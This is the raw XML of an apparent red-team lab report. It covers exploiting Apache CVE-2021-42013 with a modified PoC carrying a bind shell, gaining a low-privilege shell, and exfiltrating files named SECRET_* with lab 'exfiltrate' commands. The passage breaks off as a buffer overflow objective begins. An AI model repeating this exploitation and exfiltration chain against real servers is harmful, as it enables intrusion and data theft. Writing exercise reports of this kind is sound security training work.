            </w:pPr>
            <w:r w:rsidRPr="00464344">
              <w:rPr>
                <w:color w:val="4EA72E" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00464344" w14:paraId="5B81E251" w14:textId="77777777" w:rsidTr="00464344">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FE991C7" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A30706F" w14:textId="789D91A6" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B74DCF6" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344"/>
          <w:p w14:paraId="42E04371" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:r w:rsidRPr="000B2F04">
              <w:t>Buffer Overflow Exploit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and SSH Key</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F562EA2" w14:textId="0AC039C4" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2125" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50D6FBED" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="4EA72E" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5847F4A9" w14:textId="57F799E0" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00464344">
              <w:rPr>
                <w:color w:val="4EA72E" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00464344" w14:paraId="5D3F14D0" w14:textId="77777777" w:rsidTr="00464344">
        <w:trPr>
          <w:trHeight w:val="289"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5935B7" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20D41EFC" w14:textId="4E8A5E87" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E31428B" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344"/>
          <w:p w14:paraId="1CE31442" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:r>
              <w:t>Shellcode Development and Reverse Shell via PNG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04B5700F" w14:textId="30880B96" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2125" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031501ED" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="4EA72E" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F98A001" w14:textId="149068E6" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00464344">
              <w:rPr>
                <w:color w:val="4EA72E" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00464344" w14:paraId="37D2A510" w14:textId="77777777" w:rsidTr="00464344">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="710017DC" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="580E5038" w14:textId="526E6AB2" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C13CB18" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344"/>
          <w:p w14:paraId="67E817E3" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:r w:rsidRPr="001E748E">
              <w:t>Phishing And Internal Lateral Movement</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38285A52" w14:textId="4E8CD6A8" w:rsidR="00464344" w:rsidRPr="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:rPr>
                <w:color w:val="C00000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2125" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11B62AB0" w14:textId="77777777" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="C00000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F1DDDCB" w14:textId="00211F30" w:rsidR="00464344" w:rsidRDefault="00464344" w:rsidP="00464344">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00464344">
              <w:rPr>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>Failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6140C7A5" w14:textId="65303692" w:rsidR="00700F81" w:rsidRDefault="00700F81" w:rsidP="00464344"/>
    <w:p w14:paraId="3F0CB2B2" w14:textId="7600604D" w:rsidR="001E748E" w:rsidRDefault="00700F81" w:rsidP="00464344">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47400095" w14:textId="0A5CCCA1" w:rsidR="00F71963" w:rsidRDefault="00EA15C9" w:rsidP="00EA15C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc206031374"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="007A568D">
        <w:t>TTACKS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="160F0A74" w14:textId="1C86E8B6" w:rsidR="007A568D" w:rsidRDefault="007A568D" w:rsidP="007A568D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc206031375"/>
      <w:r>
        <w:t>OBJECTIVE 1: TRAINING GROUND</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E6A6F3" w14:textId="2B9BF0AE" w:rsidR="007A568D" w:rsidRDefault="007A568D" w:rsidP="007A568D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initial Foothold through </w:t>
      </w:r>
      <w:r w:rsidRPr="007A568D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>APACHE CVE-2021-42013 EXPLOITATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390621AB" w14:textId="2782C5FC" w:rsidR="00C5199B" w:rsidRPr="00C5199B" w:rsidRDefault="00C5199B" w:rsidP="007A568D">
      <w:r w:rsidRPr="00C5199B">
        <w:t>A proof-of-concept (PoC) script called cve-2021-42013.py was present in the attacker's home directory. which might be used against the server, that is at risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2973F643" w14:textId="38CDC8DC" w:rsidR="007A568D" w:rsidRDefault="007A568D" w:rsidP="007A568D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target Info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05096B49" w14:textId="14D3CF33" w:rsidR="007A568D" w:rsidRPr="009D1FBE" w:rsidRDefault="007A568D" w:rsidP="009D1FBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777C81">
        <w:t>Web Server IP:</w:t>
      </w:r>
      <w:r w:rsidR="009D1FBE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009D1FBE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D1FBE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.0.0.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6373263D" w14:textId="701FF3AB" w:rsidR="00777C81" w:rsidRPr="009D1FBE" w:rsidRDefault="00777C81" w:rsidP="009D1FBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777C81">
        <w:t>Running Service:</w:t>
      </w:r>
      <w:r w:rsidR="009D1FBE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009D1FBE">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D1FBE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apache HTTP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0094FA2E" w14:textId="10EA8B13" w:rsidR="00281E75" w:rsidRPr="00281E75" w:rsidRDefault="009D1FBE" w:rsidP="00281E75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00777C81" w:rsidRPr="00777C81">
        <w:t>ulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Identified</w:t>
      </w:r>
      <w:r w:rsidR="00777C81">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00777C81" w:rsidRPr="009D1FBE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2021-42013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D6CADA" w14:textId="77777777" w:rsidR="00281E75" w:rsidRDefault="00281E75" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75104068" w14:textId="7FA59F52" w:rsidR="00281E75" w:rsidRDefault="004F605B" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
      <w:r w:rsidR="00281E75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F60F51" w14:textId="286DEFD6" w:rsidR="004D2DFE" w:rsidRDefault="004F605B" w:rsidP="00281E75">
      <w:r w:rsidRPr="004F605B">
        <w:t>Found the PoC in the home directory, reviewed its Apache path traversal exploit, and replaced the payload with a Python bind shell to open a remote interactive shell to my system</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E2849" w14:textId="36F4E82F" w:rsidR="00EE0D11" w:rsidRPr="00EE0D11" w:rsidRDefault="00EE0D11" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screen Capture of Bind shell added in PoC</w:t>
      </w:r>
      <w:r w:rsidR="00280F57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A805910" w14:textId="68E595D9" w:rsidR="00EE0D11" w:rsidRDefault="00EE0D11" w:rsidP="00281E75"/>
    <w:p w14:paraId="46DD565E" w14:textId="77777777" w:rsidR="004A24DA" w:rsidRDefault="004A24DA" w:rsidP="00281E75"/>
    <w:p w14:paraId="1F981569" w14:textId="77777777" w:rsidR="004A24DA" w:rsidRDefault="004A24DA" w:rsidP="00281E75"/>
    <w:p w14:paraId="7049597F" w14:textId="77777777" w:rsidR="004A24DA" w:rsidRDefault="004A24DA" w:rsidP="00281E75"/>
    <w:p w14:paraId="0089450A" w14:textId="3DFA16F1" w:rsidR="004A24DA" w:rsidRDefault="004A24DA" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A24DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Execute Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B86B499" w14:textId="77777777" w:rsidR="00E62DDA" w:rsidRDefault="004A24DA" w:rsidP="00281E75">
      <w:r>
        <w:t>Launched the modified script and successfully exploited the Apache Server and got the shell connection</w:t>
      </w:r>
      <w:r w:rsidR="00E62DDA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618CD353" w14:textId="6FFCFBC8" w:rsidR="004A24DA" w:rsidRPr="00E62DDA" w:rsidRDefault="00E62DDA" w:rsidP="00281E75">
      <w:r>
        <w:t xml:space="preserve">Command used: </w:t>
      </w:r>
      <w:r w:rsidR="004A24DA" w:rsidRPr="004A24DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python3 ~/cve-2021-42013.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E846E8" w14:textId="6CE0DA6E" w:rsidR="00B435A2" w:rsidRDefault="004A24DA" w:rsidP="00281E75"/>
    <w:p w14:paraId="7586AE58" w14:textId="77777777" w:rsidR="00751DD2" w:rsidRDefault="00751DD2" w:rsidP="00281E75"/>
    <w:p w14:paraId="19135A38" w14:textId="01D1E8E9" w:rsidR="005D4DBB" w:rsidRPr="00751DD2" w:rsidRDefault="00751DD2" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00751DD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61629837" w14:textId="7E3CB272" w:rsidR="00047567" w:rsidRDefault="00BD5F9E" w:rsidP="00281E75">
      <w:r w:rsidRPr="00BD5F9E">
        <w:t xml:space="preserve">Successfully gained an interactive shell on the target system as the low-privileged user </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5F9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>daemon</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5F9E">
        <w:t xml:space="preserve">. Verified access by executing basic Linux commands such as id to confirm the current user and group privileges, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009838BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009838BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5F9E">
        <w:t xml:space="preserve"> to gather system information including the kernel version and operating system details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408E730" w14:textId="77777777" w:rsidR="00047567" w:rsidRDefault="00047567" w:rsidP="00281E75"/>
    <w:p w14:paraId="20815F5D" w14:textId="1DDE980F" w:rsidR="00047567" w:rsidRDefault="00047567" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00047567">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Secret Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F763E0" w14:textId="0ABCD962" w:rsidR="00047567" w:rsidRPr="00047567" w:rsidRDefault="00047567" w:rsidP="00340E68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00047567">
        <w:t>SECRET</w:t>
      </w:r>
      <w:r>
        <w:t>_wellington_arms.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D966F" w14:textId="2D054450" w:rsidR="00047567" w:rsidRDefault="00047567" w:rsidP="00340E68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SECRET_bellder_banking.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BFF0D9" w14:textId="5362EEAB" w:rsidR="00047567" w:rsidRPr="00047567" w:rsidRDefault="00047567" w:rsidP="00340E68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SECRET_subsidiary_notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B36C45F" w14:textId="2A9097B1" w:rsidR="00047567" w:rsidRDefault="00047567" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D7FB3D7" w14:textId="77777777" w:rsidR="000C6261" w:rsidRDefault="000C6261" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111D62AF" w14:textId="2F5FA0D4" w:rsidR="000C6261" w:rsidRDefault="000C6261" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9B11F5" w14:textId="77777777" w:rsidR="00A60940" w:rsidRDefault="00A60940" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0006F6" w14:textId="0EF68007" w:rsidR="00A60940" w:rsidRDefault="00A60940" w:rsidP="00281E75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3452001A" w14:textId="7DBF56BF" w:rsidR="00A60940" w:rsidRDefault="00A9778A" w:rsidP="00281E75">
      <w:r>
        <w:t xml:space="preserve">Successfully uploaded the </w:t>
      </w:r>
      <w:r w:rsidR="00A60940">
        <w:t>hidden documents back to the Red Team Server I used the command</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A60940">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3048FDB1" w14:textId="26B4D96E" w:rsidR="00A60940" w:rsidRPr="0055228D" w:rsidRDefault="00A60940" w:rsidP="00A9778A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055228D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055228D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/exfiltrate SECRET_wellington_arms.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7D3E6B" w14:textId="215C003E" w:rsidR="00A60940" w:rsidRPr="0055228D" w:rsidRDefault="00A60940" w:rsidP="00A9778A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055228D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055228D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/exfiltrate SECRET_bellder_banking.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DE2719" w14:textId="4969FAC6" w:rsidR="00A60940" w:rsidRDefault="00A60940" w:rsidP="00A9778A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055228D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055228D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/exfiltrate SECRET_subsidiary_notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B5F27" w14:textId="77777777" w:rsidR="00A7002D" w:rsidRDefault="00A7002D" w:rsidP="00A7002D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62AAFDB7" w14:textId="2F51DC62" w:rsidR="00A7002D" w:rsidRDefault="00A7002D" w:rsidP="00A7002D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4311AD" w14:textId="37443A85" w:rsidR="00014EA6" w:rsidRDefault="000442C8" w:rsidP="00A7002D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F914C0" w14:textId="12C11ABF" w:rsidR="0056262A" w:rsidRDefault="0023229A" w:rsidP="00A7002D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDDBCEB" w14:textId="6EA5843F" w:rsidR="00137B89" w:rsidRDefault="000C5348" w:rsidP="00A7002D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74579823" w14:textId="4671FC3A" w:rsidR="00137B89" w:rsidRDefault="00137B89" w:rsidP="000C5348">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc206031376"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OBJECTIVE 2: EXPAND FOOTHOLD</w:t>
      </w:r>
      <w:r w:rsidR="000C5348">
        <w:t xml:space="preserve"> THROUGH BUFFER OVERFLOW ATTACK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="61D80343" w14:textId="77777777" w:rsidR="00120DA7" w:rsidRDefault="00120DA7" w:rsidP="00120DA7"/>
    <w:p w14:paraId="665DB3B8" w14:textId="5AAB85DB" w:rsidR="00120DA7" w:rsidRDefault="00120DA7" w:rsidP="00120DA7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target Info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E7F7F" w14:textId="4EE307E2" w:rsidR="00120DA7" w:rsidRDefault="00120DA7" w:rsidP="00120DA7">
      <w:r w:rsidRPr="00120DA7">
        <w:t xml:space="preserve">The files found during the internal enumeration </w:t>
      </w:r>
      <w:r w:rsidRPr="002954AD">
        <w:t>helped to kick start the initial step of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D3C71" w14:textId="6B55C3A7" w:rsidR="00B25E66" w:rsidRDefault="000C205F" w:rsidP="000C5348">
      <w:r w:rsidRPr="000C205F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Script Location: </w:t>
      </w:r>
      <w:r w:rsidRPr="000C205F">
        <w:t>usr/local/apache2/SECRETS/upload.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B46AC7F" w14:textId="77777777" w:rsidR="00FF5A24" w:rsidRPr="00FF5A24" w:rsidRDefault="00FF5A24" w:rsidP="000C5348"/>
    <w:p w14:paraId="25D57387" w14:textId="57AE424A" w:rsidR="00E72676" w:rsidRDefault="00B25E66" w:rsidP="000C5348">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25E66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
      <w:r w:rsidR="00450A61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBFC9EE" w14:textId="715FD679" w:rsidR="00445554" w:rsidRDefault="00B25E66" w:rsidP="000C5348">
      <w:r w:rsidRPr="00B25E66">
        <w:t xml:space="preserve">Discovered the file </w:t>
      </w:r>
      <w:r w:rsidRPr="00B25E66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/usr/local/apache2/SECRETS/upload.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25E66">
        <w:t xml:space="preserve"> was linked to a binary vulnerable to buffer overflow.</w:t>
      </w:r>
      <w:r w:rsidR="00445554">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
